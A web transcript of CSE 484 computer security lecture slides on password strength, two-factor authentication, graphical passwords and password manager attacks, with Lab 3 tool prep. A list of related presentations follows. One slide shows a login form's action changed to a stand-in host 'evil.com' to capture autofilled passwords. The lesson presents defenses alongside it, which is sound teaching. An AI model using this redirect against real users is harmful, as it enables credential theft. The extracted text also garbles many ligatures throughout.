cse 484 cse m 584 computer security passwords and lab 3
play

CSE 484 / CSE M 584 Computer Security: Passwords and Lab 3 Prep - PowerPoint PPT Presentation

Aug 19, 2023 •131 likes •382 views

CSE 484 / CSE M 584 Computer Security: Passwords and Lab 3 Prep TA: Thomas Crosley tcrosley@cs Thanks to Franzi for some previous slides LogisIcs / Reminders Lab #2 due 5/20,5pm (tomorrow!) Next office hour: Thomas and Kevin: 2-3pm

  1. CSE 484 / CSE M 584 Computer Security: Passwords and Lab 3 Prep TA: Thomas Crosley tcrosley@cs Thanks to Franzi for some previous slides

  2. LogisIcs / Reminders • Lab #2 due 5/20,5pm (tomorrow!) • Next office hour: – Thomas and Kevin: 2-3pm • Today – Password strength – Two-factor authenIcaIon – Graphical passwords – Password managers – Lab 3 Intro

  3. Today • Passwords • Lab 3 Prep

  4. Measuring Password Strength • How many possible passwords are there? • How many passwords are likely to be chosen? • How long will it take to guess? • Bits of entropy: log 2 (# of guesses) Example: password of 10 bits chosen randomly Possible passwords = 2^10 Addi$onal bit of entropy doubles Bits of entropy = log 2 (2^10) = 10 number of guesses needed.

  5. Password Meters [From “How does your password measure up? The Effect of Strength Meters on Password CreaIon”, Ur et al., USENIX Security 2012]

  6. Password Meters • Meters lead to longer passwords. • Are passwords harder to guess? – Visual feedback alone has no effect. – More stringent meters do lead to stronger passwords. • Meters lead to people taking longer to create passwords, and change their mind during creaIon. • Meters don’t affect memorability. [From “How does your password measure up? The Effect of Strength Meters on Password CreaIon”, Ur et al., USENIX Security 2012]

  7. HTTP :// XKCD . COM /936/

  8. “Improving” Passwords • One popular way is Two-factor authenIcaIon – Leverages user’s phone (or other device) for authenIcaIon • Example of other devices? – One example is FIDO U2F Security Key hmps://www.yubico.com/products/yubikey-hardware/fido-u2f-security-key/

  9. Usable Two-Factor AuthenIcaIon • Use phone as a second factor automaIcally. 1 click origin-bound cookie 2 login ticket Server 3 id assertion login ticket 4 login id assertion • What if phone is not present? – Server can treat login session differently (e.g., don’t allow transacIons above a threshold $ amount) . [From “Strengthening User AuthenIcaIon through OpportunisIc Cryptographic IdenIty AsserIons”, Czeskis et al., CCS 2012]

  10. Graphical Passwords • Cognometric scheme: User picks the correct image Credits hmps://www.internetsafetyproject.org/wiki/graphical-passwords

  11. • Locimetric Scheme: Click regions of the image corresponding to pw

  12. Possible issues • People usually pick predictable points. Face, eyes, nose etc. • Tend to pick faces ‘similar’ to them, same gender or race. • Pick the most good looking face?

  13. Password Managers • Allows the user to use one secure password to secure all other passwords • Generate strong password for other sites • Convenient for the user and help log in more securely • Examples: LastPass, KeePass, built in browser password managers

  14. Password Managers: Amacks and Defenses Thanks to David Silver, Suman Jana, Dan Boneh, Eric Chen, Collin Jackson Following slides from their presentaIon hmps://www.usenix.org/conference/usenixsecurity14/ technical-sessions/presentaIon/silver

  15. Password Managers: Amacks and Defenses • Types of Password Managers – Manual Autofill – AutomaIc Autofill • AutomaIc Autofill feature may cause filling of password at an unexpected place and Ime

  16. When to autofill? • <form acIon=“login.php”> – Changed to <form acIon=hmp://evil.com> – Changed to <form acIon=hmp://evil.com> aver autofill • Click through HTTPS warning • iFrame not same-origin with parent

  17. Sweep Amacks Stealing mulIple passwords without user interacIon

  20. Video demo of amack • hmps://www.youtube.com/watch? v=n0xIiWl0pZo&feature=youtu.be hmps://www.usenix.org/conference/usenixsecurity14/ technical-sessions/presentaIon/silver

  21. Defenses • Require user interacIon before filling passwords • Secure Filling – Don’t let JavaScript read autofilled passwords – Let form submit only if acIon matches acIon when password was saved – HTTPS

  22. Lab 3 • Will be out early next week • Requires a few tools which we will go over today

  23. Android Apktool • “A tool for reverse engineering Android APK file” • (APK) Android ApplicaIon Package – package file format for distribuIng/installing Android apps • Apktool reconstructs applicaIon code that is very close to original source code > apktool d SampleApplicaIon.apk hmp://ibotpeaches.github.io/Apktool/

  24. SQLite DB Browser • Open Database (*.db file) • View the structure with “Database Structure” • Inspect the actual data with “Browse Data”

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Security: Some Fun with Passwords How to handle Passwords: the Basics Rainbow Attacks Not

Security: Some Fun with Passwords How to handle Passwords: the Basics Rainbow Attacks Not

CSCE Intro to Computer Systems Security - Passwords Security: Some Fun with Passwords How to handle Passwords: the Basics Rainbow Attacks Not too long ago Hi, I forgot my password! Let me help you. What is your name? My Name is John

369 views • 5 slides
Security 1 - Passwords Computer security is a big and kind of dramatic area which lends itself to

Security 1 - Passwords Computer security is a big and kind of dramatic area which lends itself to

Security 1 - Passwords Computer security is a big and kind of dramatic area which lends itself to movie plots and fear. There are real threats our there, but staying safe is not that hard. Computer -- The Castle The computer is like a

416 views • 37 slides
User Authentication and Passwords Storing Passwords Selecting Passwords CSS322: Security and

User Authentication and Passwords Storing Passwords Selecting Passwords CSS322: Security and

CSS322 Passwords Authentication Passwords Entropy User Authentication and Passwords Storing Passwords Selecting Passwords CSS322: Security and Cryptography Sirindhorn International Institute of Technology Thammasat University Prepared by

670 views • 28 slides
PASSWORDS CS682: Advanced Security Topics Vasiliki Panteli 3/9/2020 Passwords 1 Passwords

PASSWORDS CS682: Advanced Security Topics Vasiliki Panteli 3/9/2020 Passwords 1 Passwords

PASSWORDS CS682: Advanced Security Topics Vasiliki Panteli 3/9/2020 Passwords 1 Passwords Passwords is a user authentication mechanism that is widely adopted for many years Methods for user authentication: Something you know

901 views • 52 slides
User Authentication Storing Passwords Selecting Passwords ITS335: IT Security Tokens

User Authentication Storing Passwords Selecting Passwords ITS335: IT Security Tokens

ITS335 User Authentication Authentication Passwords User Authentication Storing Passwords Selecting Passwords ITS335: IT Security Tokens Biometrics Sirindhorn International Institute of Technology Summary Thammasat University Prepared

663 views • 40 slides
Computer Security: Passwords TA: Adrian Sham adrsham@cs Thanks to Franzi for slides. Logistics

Computer Security: Passwords TA: Adrian Sham adrsham@cs Thanks to Franzi for slides. Logistics

CSE 484 / CSE M 584 Computer Security: Passwords TA: Adrian Sham adrsham@cs Thanks to Franzi for slides. Logistics / Reminders Class tomorrow at PCAR 290 Lab #2 due 5/20,5pm (next Wednesday) Next office hour: Michael and

574 views • 22 slides
ISE 331 Fundamentals of Computer Security Authentication and Attacks Agenda User

ISE 331 Fundamentals of Computer Security Authentication and Attacks Agenda User

ISE 331 Fundamentals of Computer Security Authentication and Attacks Agenda User Authentication Authentication process Means of authentication Passwords Vulnerabilities of passwords Password Cracking Dictionary Attacks

471 views • 21 slides
Passwords in the Wild Passwords in the Wild Who am I...? My blog... SkullSecurity.org Random

Passwords in the Wild Passwords in the Wild Who am I...? My blog... SkullSecurity.org Random

Passwords in the Wild Passwords in the Wild Who am I...? My blog... SkullSecurity.org Random research, rants, etc. Nmap dev news Password database I post updates to Twitter https://twitter.com/iagox86 My job... Tenable Network Security

990 views • 88 slides
Lecture 3 - Passwords and Authentication CMPSC 443 - Spring 2012 Introduction Computer and

Lecture 3 - Passwords and Authentication CMPSC 443 - Spring 2012 Introduction Computer and

Lecture 3 - Passwords and Authentication CMPSC 443 - Spring 2012 Introduction Computer and Network Security Professor Jaeger www.cse.psu.edu/~tjaeger/cse443-s12 CMPSC 443 Introduction to Computer and Network Security - Spring 2012 - Professor

589 views • 19 slides
Good Passwords, Bad Passwords, and How to See the Difference David Klaftenegger Department of

Good Passwords, Bad Passwords, and How to See the Difference David Klaftenegger Department of

Good Passwords, Bad Passwords, and How to See the Difference David Klaftenegger Department of Information Technology Uppsala University, Sweden 20. January 2020 Caveat Auditor Background Passwords this talk contains opinions Diceware

447 views • 43 slides
Keys to the Kingdom A presentation to: E-Business 2008 Mike Auty E-Security at WDL Date: 16 th

Keys to the Kingdom A presentation to: E-Business 2008 Mike Auty E-Security at WDL Date: 16 th

Keys to the Kingdom A presentation to: E-Business 2008 Mike Auty E-Security at WDL Date: 16 th October 2008 Overview Securing Systems Passwords Storing Passwords Guessing Passwords What can I do about it?

518 views • 16 slides
Hour #1: Passwords Identification, Authentication, and Authorization Identification: You

Hour #1: Passwords Identification, Authentication, and Authorization Identification: You

CSCI E-170 Computer Security, Usability &amp; Privacy Hour #1: Passwords Identification, Authentication, and Authorization Identification: You give your name Authentication: Youve proven that its really you.

486 views • 31 slides
Information Security Forum Fall 2018 Gary McCrillis &amp; Jon Vazquez Information Security

Information Security Forum Fall 2018 Gary McCrillis &amp; Jon Vazquez Information Security

Information Security Forum Fall 2018 Gary McCrillis &amp; Jon Vazquez Information Security Analysts, Cal Poly Information Security Office 9/28/18 1 Better Passwords, with 9/28/18 2 Ninjio Video 9/28/18 3 Passwords Are (Still) Hard

387 views • 10 slides
Lecture 3 - Passwords and Authentication CSE497b - Spring 2007 Introduction Computer and Network

Lecture 3 - Passwords and Authentication CSE497b - Spring 2007 Introduction Computer and Network

Lecture 3 - Passwords and Authentication CSE497b - Spring 2007 Introduction Computer and Network Security Professor Jaeger www.cse.psu.edu/~tjaeger/cse497b-s06/ CSE497b Introduction to Computer and Network Security - Spring 2007 - Professor

560 views • 19 slides
Password hashing CS 161: Computer Security Prof. Raluca Ada Popa Feb 19, 2018 Announcement

Password hashing CS 161: Computer Security Prof. Raluca Ada Popa Feb 19, 2018 Announcement

Password hashing CS 161: Computer Security Prof. Raluca Ada Popa Feb 19, 2018 Announcement Project 2 to be released Thursday Midterm grades announced at end of week Passwords Tension between usability and security choose random and choose

528 views • 20 slides
Authentication and Passwords Autumn 2016 Tadayoshi Kohno yoshi@cs.Washington.edu Thanks to Dan

Authentication and Passwords Autumn 2016 Tadayoshi Kohno yoshi@cs.Washington.edu Thanks to Dan

CSE 484 / CSE M 584: Computer Security and Privacy Authentication and Passwords Autumn 2016 Tadayoshi Kohno yoshi@cs.Washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, John Manferdelli, John Mitchell, Franzi Roesner, Vitaly

751 views • 39 slides
What Savvy Energy Consumers Should Know: Prep for Winter Edition Renewable Energy Options

What Savvy Energy Consumers Should Know: Prep for Winter Edition Renewable Energy Options

What Savvy Energy Consumers Should Know: Prep for Winter Edition Renewable Energy Options Womens Advocates Recorded on November 19, 2020 CUB is a nonprofit, independent consumer advocate. Overview Housekeeping Your Energy Rights

311 views • 17 slides
PREPARATORY SCHOOL TO THE Winter College on Optics 2017: Applied Optical Techniques for

PREPARATORY SCHOOL TO THE Winter College on Optics 2017: Applied Optical Techniques for

PREPARATORY SCHOOL TO THE Winter College on Optics 2017: Applied Optical Techniques for Bio-Imaging ------------------- EXPERIMENTS in the DIFFRACTION LABORATORY ANNA CONSORTINI UNIVERSITA` DEGLI STUDI DI FIRENZE anna.consortini@unifi.it

276 views • 5 slides
Higher randomness Benoit Monin - LIAFA - University of Paris VII Join work with Laurent Bienvenu

Higher randomness Benoit Monin - LIAFA - University of Paris VII Join work with Laurent Bienvenu

Higher randomness Higher continuous reductions Higher continuous relativization Higher randomness Benoit Monin - LIAFA - University of Paris VII Join work with Laurent Bienvenu &amp; Noam Greenberg CCR - 23 September 2013 Higher randomness

667 views • 51 slides
Analysis Analysis of Analysis Analysis of of a Real Case Study : of a Real Case Study : a

Analysis Analysis of Analysis Analysis of of a Real Case Study : of a Real Case Study : a

Analysis Analysis of Analysis Analysis of of a Real Case Study : of a Real Case Study : a Real Case Study : a Real Case Study : the the WORKPAD Project WORKPAD Project j Introduction Introduction d Requirements Engineering

1.18k views • 89 slides
Is Professional Certification for You? Certified Practitioner in Financial Capability

Is Professional Certification for You? Certified Practitioner in Financial Capability

Is Professional Certification for You? Certified Practitioner in Financial Capability Information/Prep Session #3 Barry Altland, Chief Credentialing Officer The Institute for Financial Capability A Message From Our Sponsors Investing In Your

452 views • 12 slides
PrEP (Pre-Exposure Prophylaxis) and HIV testing innovations Last updated: October 2018

PrEP (Pre-Exposure Prophylaxis) and HIV testing innovations Last updated: October 2018

HIV and AIDS Data Hub for Asia-Pacific Review in slides PrEP (Pre-Exposure Prophylaxis) and HIV testing innovations Last updated: October 2018 www.aidsdatahub.org HIV and AIDS Data Hub for Asia-Pacific PrEP availability through

219 views • 7 slides
Why Are We Here? CSCE CSCE 496/896 496/896 Lecture 10: Lecture 10: CSCE 496/896 Lecture 10:

Why Are We Here? CSCE CSCE 496/896 496/896 Lecture 10: Lecture 10: CSCE 496/896 Lecture 10:

Why Are We Here? CSCE CSCE 496/896 496/896 Lecture 10: Lecture 10: CSCE 496/896 Lecture 10: How to Give a How to Give a Good Good Research Talk Research Talk How to Give a Good Research Talk For your work to have significant impact,

195 views • 4 slides
Leadership Briefing September 2020 Introduction and Welcome Martin Smith Before We Start ...

Leadership Briefing September 2020 Introduction and Welcome Martin Smith Before We Start ...

Leadership Briefing September 2020 Introduction and Welcome Martin Smith Before We Start ... Just a quick reminder that you can download this presentation via the brand new LLP website at: https://lincolnshirelearningpartnership.org/

340 views • 32 slides

More recommend